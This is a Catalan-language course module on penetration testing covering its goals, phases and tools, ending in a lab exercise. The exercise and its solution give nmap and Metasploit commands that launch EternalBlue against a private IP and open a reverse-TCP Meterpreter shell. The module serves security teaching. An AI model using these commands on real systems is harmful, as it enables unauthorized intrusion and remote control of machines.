Introducció
Les proves de penetració, també conegudes com a pentesting, són una part fonamental de la seguretat informàtica. Aquestes proves simulen atacs reals per identificar i explotar vulnerabilitats en sistemes, xarxes i aplicacions. L'objectiu és descobrir i corregir aquestes vulnerabilitats abans que puguin ser explotades per atacants malintencionats.
Objectius de les Proves de Penetració
- Identificar Vulnerabilitats: Detectar les debilitats en els sistemes que podrien ser explotades per atacants.
- Avaluar l'Impacte: Determinar l'impacte potencial de les vulnerabilitats descobertes.
- Provar Controls de Seguretat: Verificar l'eficàcia dels controls de seguretat existents.
- Millorar la Seguretat: Proporcionar recomanacions per millorar la seguretat dels sistemes.
Tipus de Proves de Penetració
-
Proves de Caixa Negra (Black Box):
- L'atacant no té informació prèvia sobre el sistema.
- Simula un atacant extern sense accés privilegiat.
-
Proves de Caixa Blanca (White Box):
- L'atacant té accés complet a la informació del sistema.
- Simula un atacant intern amb accés privilegiat.
-
Proves de Caixa Grisa (Gray Box):
- L'atacant té informació parcial sobre el sistema.
- Simula un atacant amb algun nivell d'accés intern.
Fases de les Proves de Penetració
-
Planificació i Reconeixement:
- Definir l'abast i els objectius de la prova.
- Recopilar informació sobre els sistemes objectiu (reconeixement passiu i actiu).
-
Escaneig i Enumeració:
- Utilitzar eines per escanejar els sistemes i identificar serveis, ports oberts i versions de programari.
- Enumerar usuaris, recursos compartits i altres components del sistema.
-
Explotació:
- Intentar explotar les vulnerabilitats identificades per obtenir accés no autoritzat.
- Utilitzar tècniques com l'injecció SQL, l'explotació de vulnerabilitats de programari, etc.
-
Manteniment de l'Accés:
- Intentar mantenir l'accés al sistema compromès per avaluar la persistència de l'atac.
- Instal·lar backdoors o altres mecanismes per mantenir l'accés.
-
Anàlisi i Informes:
- Analitzar els resultats de la prova.
- Elaborar un informe detallat amb les vulnerabilitats descobertes, l'impacte potencial i les recomanacions per a la seva correcció.
Eines de Proves de Penetració
Eines d'Escaneig i Enumeració
Eina | Descripció |
---|---|
Nmap | Escàner de xarxes per descobrir hosts i serveis en una xarxa. |
Nessus | Escàner de vulnerabilitats que identifica problemes de seguretat. |
OpenVAS | Plataforma d'escaneig de vulnerabilitats de codi obert. |
Eines d'Explotació
Eina | Descripció |
---|---|
Metasploit | Marc d'explotació que proporciona eines per desenvolupar i executar exploits. |
SQLmap | Eina per automatitzar la detecció i explotació d'injeccions SQL. |
Burp Suite | Plataforma per provar la seguretat de les aplicacions web. |
Exemple Pràctic: Utilitzant Metasploit
Pas 1: Iniciar Metasploit
Pas 2: Seleccionar un Exploit
Pas 3: Configurar els Paràmetres
Pas 4: Executar l'Exploit
Explicació del Codi
msfconsole
: Inicia la consola de Metasploit.use exploit/windows/smb/ms17_010_eternalblue
: Selecciona l'exploit EternalBlue per a SMB.set RHOSTS 192.168.1.100
: Defineix l'objectiu de l'exploit.set PAYLOAD windows/x64/meterpreter/reverse_tcp
: Selecciona el payload que s'executarà a l'objectiu.set LHOST 192.168.1.101
: Defineix l'adreça IP de l'atacant per rebre la connexió inversa.exploit
: Executa l'exploit.
Exercici Pràctic
Objectiu
Realitzar una prova de penetració bàsica utilitzant Nmap i Metasploit per identificar i explotar una vulnerabilitat en un sistema objectiu.
Passos
-
Escanejar la Xarxa amb Nmap:
- Utilitza Nmap per escanejar la xarxa i identificar els serveis actius en un sistema objectiu.
nmap -sS -p- 192.168.1.100
-
Seleccionar un Exploit amb Metasploit:
- Inicia Metasploit i selecciona un exploit adequat per a un dels serveis identificats.
-
Configurar i Executar l'Exploit:
- Configura els paràmetres necessaris i executa l'exploit per comprovar si pots obtenir accés al sistema objectiu.
Solució
-
Escaneig amb Nmap:
nmap -sS -p- 192.168.1.100
Resultat esperat: Llistat de ports oberts i serveis actius.
-
Seleccionar i Configurar l'Exploit:
msfconsole use exploit/windows/smb/ms17_010_eternalblue set RHOSTS 192.168.1.100 set PAYLOAD windows/x64/meterpreter/reverse_tcp set LHOST 192.168.1.101
-
Executar l'Exploit:
exploit
Resultat esperat: Obtenció d'una sessió de Meterpreter en el sistema objectiu.
Errors Comuns i Consells
-
Error: No es pot connectar a l'objectiu:
- Verifica que l'adreça IP de l'objectiu és correcta i que el servei està actiu.
- Assegura't que no hi ha firewalls bloquejant la connexió.
-
Error: Exploit falla:
- Comprova que l'exploit seleccionat és adequat per a la versió del servei objectiu.
- Revisa els paràmetres configurats i assegura't que són correctes.
Conclusió
Les proves de penetració són una eina essencial per avaluar la seguretat dels sistemes. Mitjançant la identificació i explotació de vulnerabilitats, els professionals de la seguretat poden millorar la protecció dels seus sistemes i prevenir atacs futurs. En aquest mòdul, hem explorat els objectius, tipus, fases i eines de les proves de penetració, així com un exemple pràctic per aplicar aquests conceptes.
Fonaments de Seguretat Informàtica
Mòdul 1: Introducció a la Seguretat Informàtica
- Conceptes Bàsics de Seguretat Informàtica
- Tipus d'Amenaces i Vulnerabilitats
- Principis de la Seguretat Informàtica
Mòdul 2: Ciberseguretat
- Definició i Abast de la Ciberseguretat
- Tipus d'Atacs Cibernètics
- Mesures de Protecció en Ciberseguretat
- Casos d'Estudi d'Incidents de Ciberseguretat
Mòdul 3: Criptografia
- Introducció a la Criptografia
- Criptografia Simètrica
- Criptografia Asimètrica
- Protocols Criptogràfics
- Aplicacions de la Criptografia
Mòdul 4: Gestió de Riscos i Mesures de Protecció
- Avaluació de Riscos
- Polítiques de Seguretat
- Controls de Seguretat
- Pla de Resposta a Incidents
- Recuperació davant Desastres
Mòdul 5: Eines i Tècniques de Seguretat
- Eines d'Anàlisi de Vulnerabilitats
- Tècniques de Monitoratge i Detecció
- Proves de Penetració
- Seguretat en Xarxes
- Seguretat en Aplicacions
Mòdul 6: Bones Pràctiques i Normatives
- Bones Pràctiques en Seguretat Informàtica
- Normatives i Estàndards de Seguretat
- Compliment i Auditoria
- Formació i Sensibilització